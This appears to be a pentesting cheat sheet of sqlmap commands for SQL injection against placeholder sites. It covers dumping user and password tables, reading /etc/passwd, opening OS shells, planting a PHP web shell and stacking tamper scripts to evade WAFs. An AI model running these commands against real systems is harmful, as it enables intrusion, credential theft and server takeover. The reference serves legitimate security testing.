SQLMap#

sqlmap is an open-source penetration testing tool that automates detection and exploitation of SQL injection flaws and taking over database servers. The operator drives it against web apps to enumerate schemas, dump tables, and pivot to OS or DB shells.

Mapping#

Command

Effect

sqlmap -u "http://example.com/login.php"

Simple mapping option.

sqlmap -u "http://example.com/login.php" --tor --tor-type=SOCKS5

Use TOR SOCKS5 proxy.

sqlmap -u "http://example.com/login.php" --time-sec 15

Manually set the return time.

Enum#

Command

Effect

sqlmap -u "http://example.com/login.php" --dbs

List all databases.

sqlmap -u "http://example.com/login.php" -D site_db --tables

List all tables in a database.

sqlmap -u "http://example.com/login.php" -D database_name -T users --columns

List all columns in a table.

Auth#

Command

Effect

sqlmap -u "http://example.com/login.php" --data="id=1&str=val" -p "pid" -b --cookie="cookie1=<cookie_value1>;cookie2=<cookie_value2>" --random-agent --risk 3 --level 5

Use authentication cookie.

sqlmap -u "http://example.com/login.php" --method "POST" --data "username=user&password=user&submit=Submit" -D database_name -T users --dump

Use credentials to dump a database table.

Dump#

Command

Effect

sqlmap -u "http://example.com/login.php" -D site_db -T users -C username,password --dump

Dump only selected columns.

sqlmap -u "http://example.com/login.php" -D database_name -T users --dump

Dump database table content.

sqlmap -u http://example.com/Less-1/?id=1 -D database_name -T table_name --dump-all

Dump all.

sqlmap -u http://example.com/Less-1/?id=1 --privileges | grep FILE

Check privileges.

Shell#

Command

Effect

sqlmap --dbms=mysql -u "http://example.com/login.php" --os-shell

SQLMap OS shell.

sqlmap --dbms=mysql -u "http://example.com/login.php" --sql-shell

SQLMap SQL shell.

Files#

Command

Effect

sqlmap -u <URL> --file-read=<file to read>

Read a file.

sqlmap -u http://localhost/Less-1/?id=1 --file-read=/etc/passwd

Read /etc/passwd.

sqlmap -u <url> --file-write=<file> --file-dest=<path>

Write a file.

sqlmap -u http://example.com/Less-1/?id=1 --file-write=shell.php --file-dest=/var/www/html/shell-php.php

Drop a PHP web shell.

POST#

Command

Effect

sqlmap -u <POST-URL> --data="<POST-parameters>"

Generic POST attack.

sqlmap -u http://example.com/Less-11/ --data "uname=teste&passwd=&submit=Submit" -p uname

POST attack against uname field.

./sqlmap.py -r post-request.txt -p uname

Use a saved POST request file.

Tamper#

Launch all tamper scripts at once.

$ sqlmap -u 'http://www.example.com:80/search.cmd?form_state=1' --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

References#